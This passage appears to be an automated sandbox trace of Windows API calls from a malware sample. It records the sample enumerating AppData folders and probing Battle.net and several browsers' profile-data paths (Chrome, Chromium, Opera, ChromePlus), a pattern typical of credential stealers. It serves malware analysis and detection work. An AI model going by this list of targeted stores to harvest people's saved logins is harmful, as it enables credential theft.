ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.582] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.583] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0281.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.584] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media", lpFilePart=0x0) returned 0x38 [0281.584] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf7de167e, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.584] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.585] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0281.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.585] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar", lpFilePart=0x0) returned 0x3a [0281.586] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.586] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0281.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.587] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0281.587] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xfaf71720, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xfaf71720, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.599] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.600] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0281.600] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xfaf71720, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xfaf71720, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.601] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.601] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0281.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.601] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0281.602] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b18e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b18e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.602] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.603] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0281.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.603] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low", lpFilePart=0x0) returned 0x29 [0281.603] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.604] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.604] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0281.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.605] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE", lpFilePart=0x0) returned 0x2c [0281.605] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.605] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.606] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0281.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.606] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files", lpFilePart=0x0) returned 0x39 [0281.606] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.649] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0281.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.649] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0281.649] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c118 [0281.650] FindClose (in: hFindFile=0x59c118 | out: hFindFile=0x59c118) returned 1 [0281.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.650] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore", lpFilePart=0x0) returned 0x2d [0281.651] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\VirtualStore\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7b85dd30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7b85dd30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7b85dd30, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c118 [0281.651] FindClose (in: hFindFile=0x59c118 | out: hFindFile=0x59c118) returned 1 [0281.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.651] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0281.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.652] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0281.652] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c118 [0281.653] FindClose (in: hFindFile=0x59c118 | out: hFindFile=0x59c118) returned 1 [0281.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.653] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex", lpFilePart=0x0) returned 0x27 [0281.653] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c118 [0281.654] FindClose (in: hFindFile=0x59c118 | out: hFindFile=0x59c118) returned 1 [0281.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.654] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0281.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.654] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon", lpFilePart=0x0) returned 0x2f [0281.654] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Yandex\\YaAddon\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe39b9920, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xe39b9920, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xe39b9920, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c118 [0281.655] FindClose (in: hFindFile=0x59c118 | out: hFindFile=0x59c118) returned 1 [0281.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.747] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.747] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0281.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.747] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0281.747] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.749] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.749] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0281.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.749] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0281.749] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.751] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.751] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0281.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.751] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0281.751] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.752] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.753] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0281.753] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.753] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0281.753] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.753] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.754] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.754] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0281.754] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.754] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x43e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0281.755] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x43e800 | out: lpFindFileData=0x43e800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0281.755] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c0) returned 1 [0281.756] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0281.756] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x43e9b8, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0281.756] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea50) returned 1 [0281.756] GetFullPathNameW (in: 